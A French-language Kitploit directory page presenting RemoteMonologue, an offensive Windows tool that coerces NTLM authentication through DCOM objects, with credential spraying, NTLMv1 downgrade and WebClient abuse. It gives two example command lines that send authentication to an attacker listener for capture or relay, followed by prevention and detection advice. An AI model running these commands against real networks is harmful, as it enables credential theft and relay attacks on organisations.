Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
RemoteMonologue — Armer DCOM pour les coercitions d'authentification NTLM | Kitploit
Outils/GitHubGitHub/3lp4tr0n/remotemonologue
ReconnaissanceAttaques de Mots de PasseExploitationMouvement LatéralPost-ExploitationTests d'IntrusionAuthentificationRed TeamingAttaque Adversariale
GitHub3lp4tr0n/remotemonologue

RemoteMonologue

Armer DCOM pour les coercitions d'authentification NTLM

21542il y a 9 moisVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Voir le dépôt
Partager

RemoteMonologue

RemoteMonologue est une technique de collecte d'identifiants Windows qui permet de compromettre des utilisateurs à distance en exploitant la clé RunAs de l'utilisateur interactif et en forçant des authentifications NTLM via DCOM.

Lisez l'article de X-Force Red RemoteMonologue : Armer DCOM pour les coercitions d'authentification NTLM pour plus de détails.

Fonctionnalités

🔹 Coercition d'authentification via DCOM (-dcom)

  • Cible quatre objets DCOM (ServerDataCollectorSet, FileSystemImage, MSTSWebProxy, UpdateSession) pour déclencher une authentification NTLM contre un écouteur spécifié (-auth-to).

🔹 Pulvérisation d'identifiants (-spray)

  • Valide les identifiants sur plusieurs systèmes tout en capturant également les identifiants des utilisateurs.

🔹 Attaque par rétrogradation NetNTLMv1 (-downgrade)

  • Force les cibles à utiliser NTLMv1, ce qui facilite le cassage et le relais des identifiants.

🔹 Abus du service WebClient (-webclient)

  • Active le service WebClient pour faciliter la coercition d'authentification basée sur HTTP.

🔹 Énumération des utilisateurs (-query)

  • Identifie les utilisateurs disposant d'une session active sur le système cible.

Remarque : Des privilèges d'administrateur local sur le système cible sont requis.

Installation

root@kitploit:~
pip install impacket

Exemples

Voici un exemple d'exécution de RemoteMonologue avec l'attaque par rétrogradation NetNTLMv1 tout en utilisant Responder comme écouteur. Par défaut, si aucune option DCOM n'est spécifiée, l'outil utilise l'objet DCOM ServerDataCollectorSet.

root@kitploit:~
RemoteMonologue.py domain/user:password@target -auth-to [listener IP] -downgrade

image

Voici un autre exemple : cette fois, l'attaque est exécutée à l'aide de l'objet DCOM FileSystemImage et de l'activation du service WebClient pour obtenir une authentification HTTP, qui est ensuite relayée vers LDAP à l'aide de ntlmrelayx.

root@kitploit:~
RemoteMonologue.py domain/user:password@target -auth-to [listener NETBIOS@PORT] -webclient -dcom FileSystemImage

image

Considérations défensives

Pour se protéger contre ces techniques et les détecter, plusieurs mesures de prévention et de détection peuvent être mises en œuvre.

Mesures de prévention :

  1. Activer la signature LDAP et la liaison de canal : Configurez l'application de la signature LDAP et la liaison de canal sur les contrôleurs de domaine afin de protéger le point de terminaison LDAP contre les attaques par relais. Remarque : Ces paramètres seront appliqués par défaut à partir de Windows Server 2025.

  2. Passer aux dernières versions de Windows : Mettez à niveau les serveurs vers Windows Server 2025 et les postes de travail vers Windows 11 version 24H2 afin d'atténuer les attaques par rétrogradation NetNTLM, car NTLMv1 a été supprimé dans ces versions.

  3. Appliquer la signature SMB : Activez et appliquez la signature SMB sur les serveurs Windows pour empêcher les attaques par relais SMB.

  4. Mettre en œuvre des politiques de mots de passe forts : Imposez des exigences de mots de passe robustes afin de rendre les attaques par cassage de mots de passe plus difficiles.

Opportunités de détection :

  1. Surveiller l'accès distant aux objets DCOM : Suivez l'accès aux objets DCOM concernés ainsi qu'à leurs propriétés et méthodes spécifiques afin d'identifier toute activité inhabituelle.

  2. Surveiller les modifications du registre : Surveillez les modifications des clés de registre RunAs et LmCompatibilityLevel.

  3. Suivre l'activité du service WebClient : Surveillez les cas où le service WebClient est activé à distance, car il est utilisé pour faciliter les authentifications NTLM basées sur HTTP.

Télécharger l’outil